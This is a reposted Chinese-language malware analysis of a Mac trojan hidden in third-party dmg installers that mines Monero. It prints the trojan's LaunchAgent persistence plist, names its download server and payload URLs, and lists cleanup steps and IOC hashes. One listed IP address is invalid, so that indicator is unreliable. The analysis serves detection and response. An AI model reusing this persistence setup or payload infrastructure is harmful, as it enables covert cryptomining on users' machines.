碼上歡樂
相關內容    簡體    繁體

Mac下一款門羅幣挖礦木馬的簡要分析

本文轉載自   查看原文   2018-08-17 18:47   3305    安全分析與應急響應

背景

最近在應急中發現了一款Mac上的挖礦木馬,目標是挖門羅幣,經過走訪,受害用戶都有從蘋果電腦上安裝第三方dmg的經歷(其中可以確定一款LOL Mac私服安裝app會導致該木馬),懷疑在網上很多第三方dmg都是攜帶了相關惡意程序的。

現象

根據用戶反映中招用戶一般會有以下幾個症狀:

  • CPU占有率高
  • 系統卡頓
  • 活動監視器打不開
  • 電腦過熱

木馬

感染

經過簡要分析,懷疑該木馬源起於第三方安裝包,在解壓安裝過程中,生成了一個偽裝成11.png(名字可以變)的惡意文件和com.apple.Yahoo.plist(~/Library/LaunchAgents/目錄下)文件和com.apple.Google.plist(~/Library/LaunchAgents/目錄下)文件

  • com.apple.Google.plist(啟動項配置)文件如下,它引導com.apple.Yahoo.plist執行
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.apple.Google</string>
	<key>Program</key>
	<string>/usr/bin/osascript</string>
	<key>ProgramArguments</key>
	<array>
		<string>osascript</string>
		<string>-e</string>
		<string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string>
	</array>
	<key>RunAtLoad</key>
	<true/>
	<key>StartInterval</key>
	<integer>31104000</integer>
	<key>WatchPaths</key>
	<array/>
</dict>
</plist>

啟動

找到一個其他的png文件,經鑒定運行起來后與11.png效果一致,認為是該木馬的AppleScript文件。
該文件運行后會去ondayon.com:8080下載下列惡意文件

路徑:~/Library/Safari目錄下

  • ssl.plist(挖礦程序)
  • pools.txt
  • cpu.txt
  • config.txt
-rwxr-xr-x@  1 xxxxxx  staff   788212  8 17 16:08 ssl.plist
-rw-r--r--@  1 xxxxxx  staff      343  8 17 16:08 config.txt
-rw-r--r--@  1 xxxxxx  staff      229  8 17 16:08 pools.txt
-rw-r--r--@  1 xxxxxx  staff      256  8 17 16:08 cpu.txt

以及在對應的~/Library/Safari/openssl/lib/目錄下
libcrypto.1.0.0.dylib
libssl.1.0.0.dylib

drwxr-xr-x@  4 xxxxxx  staff   128  5 30 16:51 .
drwxr-xr-x@  3 xxxxxx  staff      96 5 30 16:51 ..
-rwxr-xr-x@  1 xxxxxx  staff    385152  9 29  2017 libssl.1.0.0.dylib
-rwxr-xr-x@  1 xxxxxx  staff    1767648  9 29  2017 libcrypto.1.0.0.dylib

挖礦

ssl.plist是xmr的編譯后的挖礦從程序,主要進行挖礦。

應急修復

  • 刪除上文中提到的所有文件,殺掉相關進程;
  • 查找自己下載安裝的第三方dmg或其他第三方APP安裝包,找到有問題的之后刪除即可;

相關IOC

IP地址

43.294.204.183
45.195.146.32
101.55.20.149

# Domain

ondayon.com

URL

http://ondayon.com:8080/ssl.zip
http://101.55.20.149/ssl.zip
http://101.55.20.149/gogoto.png
http://101.55.20.149/8/Build.zip

Hash


0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697(ibcrypto.1.0.0.dylib)
fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804(ssl.plist)
c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3(libssl.1.0.0.dylib)
f89205a8091584e1215cf33854ad764939008004a688b7e530b085e3230effce(ondayon.png) 
5619d101a7e554c4771935eb5d992b1a686d4f80a2740e8a8bb05b03a0d6dc2b(Install-LOL.app.zip)
2b566d454faabb38cd5b173f9365b89bda5e88d4bfaa7dea97512cc9d89e9150(Build.zip)
6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d(x.x)
ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f(com.apple.Yahoo.plist)
2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7(com.apple.Google.plist)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 捕獲一款無名挖礦木馬(門羅幣)樣本分析 教你檢測門羅幣挖礦木馬 挖礦-門羅幣 門羅幣_挖礦 門羅幣挖礦解決方案 Mac下門羅幣礦工樣本分析 Web應急:門羅幣惡意挖礦 門羅幣(xmr,XMR)挖礦教程 分析一款遠控木馬的通訊過程 打造一款虛擬幣交易分析軟件
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM